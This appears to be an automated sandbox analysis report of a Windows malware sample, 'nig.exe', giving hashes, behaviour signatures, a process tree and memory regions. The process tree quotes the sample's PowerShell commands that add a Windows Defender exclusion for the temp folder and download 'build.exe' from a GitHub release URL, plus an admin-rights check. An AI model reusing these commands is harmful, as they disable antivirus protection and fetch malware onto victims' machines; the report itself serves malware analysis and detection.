Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20250207-en
  • resource tags

    arch:x64arch:x86image:win7-20250207-enlocale:en-usos:windows7-x64system
  • submitted
    22/03/2025, 02:34

General

  • Target

    nig.exe

  • Size

    56KB

  • MD5

    827c7f426f6d6770d127ee96a29ad6db

  • SHA1

    0ed96a36e037baef30f459cc54a50db51ca0e9d9

  • SHA256

    90e7162a771d6d4ad5e46f38611fec16d2dee5583d628ef7bf205e727e6ebff4

  • SHA512

    c2cba465541b8f5ecd7e8fd48bcbf7a02c97279b7c7edb10601d8d7646b28bb30059470248164a13122fd65de2a8318d4f337739dac326ea871d870bd1d8b782

  • SSDEEP

    1536:U4dJooh0Wa0aer344Jw/ytUqVS5EkIijQ1fTNHmn5aHc:U4dzVTaer344JzthRZijQ1J6

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Hide Artifacts: Ignore Process Interrupts 1 TTPs 2 IoCs

    Command interpreters often include specific commands/flags that ignore errors and other hangups.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\nig.exe
    "C:\Users\Admin\AppData\Local\Temp\nig.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1716
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\903E.tmp\903F.tmp\9040.bat C:\Users\Admin\AppData\Local\Temp\nig.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2552
      • C:\Windows\system32\net.exe
        net session
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1944
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 session
          4⤵
            PID:2652
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Hide Artifacts: Ignore Process Interrupts
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2232
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/build.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\build.exe\" -ErrorAction Stop"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2156
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -Command "Remove-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"
          3⤵
          • Hide Artifacts: Ignore Process Interrupts
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2960

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\903E.tmp\903F.tmp\9040.bat

      Filesize

      2KB

      MD5

      1c935ef28fdfd394b770d945d7f04d76

      SHA1

      29e251c3c40ce4ad1b2984bf26b444aa045d9b21

      SHA256

      aa58e1df5882878a44687853f47d10b655c3fe888ec20fb99446305f5d38c681

      SHA512

      a9e60f2ac4aec15a3ba0a95df224449f64777a027357792247dd597529542e79128aec996c89ff86a1654911b4b763c577d3c3d2f38c59b02b280b8ad824e7e1

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

      Filesize

      7KB

      MD5

      55b4828145e7be3154ddaec4bc256346

      SHA1

      ffaa9b6f9ce342da0a5e5a6f0eb743ec775f74a7

      SHA256

      cc298f9ce853d5c55e2f31db9ecda01262963dcc566d3019e8bb2b0605999de3

      SHA512

      6a28f9ddb3a42d9e3d170c13b9e885e041b2abd4baa7473bf646e18e4e6525ed5d6cc7570784cec8eb615750088b065a796066487c72cb5ed8b4104d10b223d0

    • memory/1716-0-0x0000000140000000-0x0000000140027000-memory.dmp

      Filesize

      156KB

    • memory/1716-27-0x0000000140000000-0x0000000140027000-memory.dmp

      Filesize

      156KB

    • memory/2156-21-0x00000000020F0000-0x00000000020F8000-memory.dmp

      Filesize

      32KB

    • memory/2156-20-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

      Filesize

      2.9MB

    • memory/2232-12-0x000007FEF56C0000-0x000007FEF605D000-memory.dmp

      Filesize

      9.6MB

    • memory/2232-9-0x0000000002870000-0x0000000002878000-memory.dmp

      Filesize

      32KB

    • memory/2232-13-0x000007FEF56C0000-0x000007FEF605D000-memory.dmp

      Filesize

      9.6MB

    • memory/2232-14-0x000007FEF56C0000-0x000007FEF605D000-memory.dmp

      Filesize

      9.6MB

    • memory/2232-11-0x000007FEF56C0000-0x000007FEF605D000-memory.dmp

      Filesize

      9.6MB

    • memory/2232-10-0x000007FEF56C0000-0x000007FEF605D000-memory.dmp

      Filesize

      9.6MB

    • memory/2232-8-0x000000001B690000-0x000000001B972000-memory.dmp

      Filesize

      2.9MB

    • memory/2232-7-0x000007FEF597E000-0x000007FEF597F000-memory.dmp

      Filesize

      4KB